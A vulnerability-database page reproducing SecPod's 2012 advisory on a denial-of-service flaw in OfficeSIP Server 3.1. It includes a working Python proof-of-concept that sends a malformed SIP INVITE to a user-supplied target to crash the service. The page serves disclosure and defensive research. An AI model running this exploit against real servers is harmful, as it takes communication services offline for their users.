Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OfficeSIP Server 3.1 Denial Of Service Vulnerability

🗓️ 02 Feb 2012 00:00:00Reported by secpodType 
zdt
 zdt🔗 0day.today👁 10 Views

OfficeSIP Server 3.1 Denial Of Service Vulnerability caused by improper validation in SIP/SIPS UR

Code
##############################################################################
#
# Title    : OfficeSIP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
#            http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date     : 01/02/2012
#
###############################################################################
SecPod ID: 1034                 22/12/2011 Issue Discovered
                        20/01/2012 Reported to Vendor
                        No Response
                        01/02/2012 Advisory Released
Class: Denial Of Service            Severity: Medium
Overview:
---------
Office SIP Server version 3.1 is prone to a denial of service vulnerability.
Technical Description:
----------------------
The vulnerability is caused due to improper validation of SIP/SIPS URI in the
'To' header of the request, which allows remote attackers to cause denial of
service condition.
Impact:
--------
Successful exploitation could allow an attacker to crash the service.
Affected Software:
------------------
OfficeSIP Server 3.1
Tested on:
-----------
OfficeSIP Server 3.1 on Windows XP SP2 & SP3.
Older versions might be affected.
References:
-----------
http://www.officesip.com
http://secpod.org/blog/?p=461
http://www.officesip.com/download/OfficeSIP-Server-3.1.zip
Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
Solution:
----------
Not available
Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = PARTIAL
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
        Risk factor            = Medium
Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
#!/usr/bin/python
##############################################################################
#
# Title    : OfficeSIP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
#            http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date     : 01/02/2012
#
##############################################################################
import socket,sys,time
port   = 5060
target = raw_input("Enter host/target ip address: ")
if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)
print "you entered ", target
try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed service not running"
    sys.exit(1)
#Malicous To SIP URI triggers vulnerability and brings SIP port down
exploit = "INVITE sip:[email protected] SIP/2.0\r\n"+\
          "Via: SIP/2.0/UDP example.com\r\n"+\
          "To: user2 <sip:[email protected]>\r\n"+\
          "From: user1 <sip:[email protected]>;tag=00\r\n"+\
          "Call-ID: [email protected]\r\n"+\
          "CSeq: 1 INVITE\r\n"+\
          "Contact: <sip:[email protected]>\r\n\r\n"
sock.sendto(exploit, (target, port))
#Server evaluates and takes a while to go down.
time.sleep(40)
sock.close()
#Verify port is down
try:
    sock.connect()
except:
    print "OfficeSIP server port is down."
    print "Service not responding ...."
    sys.exit(1)



#  0day.today [2018-02-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2012 00:00Current
7High risk
Vulners AI Score7
officesip server 3.1denial of serviceimproper validationsip/sips uriremote attackers
10